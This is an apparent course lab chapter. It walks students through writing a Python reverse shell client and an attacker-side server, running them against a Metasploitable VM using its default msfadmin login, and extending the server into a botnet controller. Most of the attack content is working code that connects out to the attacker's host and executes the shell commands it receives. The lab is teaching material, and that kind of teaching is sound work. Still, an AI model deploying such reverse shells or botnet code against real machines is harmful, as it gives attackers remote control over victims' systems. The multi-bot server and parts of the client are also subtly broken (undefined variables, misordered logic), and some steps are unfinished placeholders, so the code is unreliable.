Chapter 6 Reverse shell & BotNet
In this lab we will learn the basics of socket programming by implementing a reverse shell. We then show how this reverse shell can be extended and be used to implement a simple botnet.
6.1.1 Sockets and process communication
A socket is a software abstraction that allows programs to communicate over then network. There are two types of sockets that are commonly used: 1) TCP socket and 2) a UDP socket. TCP sockets ensure that all the data that sent over is reliablity dilivered over network. TCP sockets are commonly used for file transfer and other applications. UDP sockets trade reliability for speed. Common applications that use UDP are audio or video applications. In lab we will used TCP sockets.
6.1.2 Reverse Shell
A reverse shell is a program that is comprised of the two parts: - A communication component that connects to the attackers computer. This were the “reverse” part of name comes from since the program is connecting to the attackeres computer and not the other way around. - The second component is a Shell component which allows the attacker to execute shell commands on the victims machine and read the result of the commands.
6.2 Setting Up Your Python Environment:
We will be developing our reverse shell in python. So you will need to setup a python development environment.
Step 1 Open the
Step 2 Save the blank file by clinking File → SaveAs client.py (Save the file to your Desktop this will just make it easier to find later in the lab)
6.3 A reverse Shell Client.
Step 3 The code below creates simple TCP socket.
import subprocess from socket import * serverName = args serverPort = 8000 clientSocket = socket(AF_INET, SOCK_STREAM) clientSocket.connect((serverName, serverPort)) clientSocket.send('Bot reporting reporting for duty'.encode()) command = clientSocket.recv(4064).decode() while command != "exit": result = subprocess.run(command.split(" "), stdout=subprocess.PIPE) message = result.stdout clientSocket.send(message) command = (clientSocket.recv(4064)).decode() clientSocket.close()
** Step 4 ** Create a folder called “botnet” on your Kali Desktop. Save the file above as “clientBot.py”
6.4 Reverse Shell Server
Step 5 Now we will write the server that runs on the attackers box.
from socket import * serverPort = 8000 serverSocket = socket(AF_INET, SOCK_STREAM) serverSocket.bind(('', serverPort)) serverSocket.listen(1) print("Attacket Box Listening and awaiting instructions") connectionSocket, addr = serverSocket.accept() print("Thanks for connecting connecting to me bot "+str(addr)) message = connectionSocket.recv(1024) print(message) command ="" while command != "exit": command = input("Please enter a command: ") connectionSocket.send(command.encode()) message = connectionSocket.recv(1024) print(message) connectionSocket.close()
Step 6 Save the file as “serverBot.py” to the “botnet” the Desktop folder you created earlier.
6.5 Running the reverse shell
We have placed a copy of the botnet client on the metasploitable virtual machine. Normally use a know vulnerability to get access to a machine as saw during the Armitage lab.
Step 7 Start the botnet by opening the terminal and navigating to folder called botnet on kali desktop. Run the file by typing python serverBot.py
[Include screen shot below]
Now the server bot is running an waiting for the clients to connect to it. So let’s activate the botnet client.
Step 8 Log into the metasploitable machine using username: msfadmin, password msfadmin.
Step 9 Cd into the folder called botnet can run the botnet client by typing: python clientBot.py [Ipaddress of your Kalibox]. (Remember that you can get the ip-address of the Kali linux box by using the ifconfig command)
[Include a picture and place botnet client on Armitage machine]
Step 10 Your client bot should now be connected to your serverbot. Try executing a whoami command.
[Include a picture]
The example above discusses a single client server pair. How would we extend so that a single machine could control serveral clients all at once. This is exactly what happens in a botnet serveral client machines will connect to a single machine call the botnet master. This machine will then send commands to all of the machines (bots) which have connected to it. The code below shows how we would extend the server to handle multiple client bots
from socket import * serverPort = 8000 serverSocket = socket(AF_INET, SOCK_STREAM) serverSocket.bind(('', serverPort)) serverSocket.listen(10) #Ten Bots max print("Attacket Box Listening and awaiting instructions") print("Thanks for connecting connecting to me bot "+str(addr)) print(message) command ="" while command != "exit": connectionSocket, addr = serverSocket.accept() message = connectionSocket.recv(1024) command = input("Please enter a command: ") connectionSocket.send(command.encode()) message = connectionSocket.recv(1024) print(message) connectionSocket.close()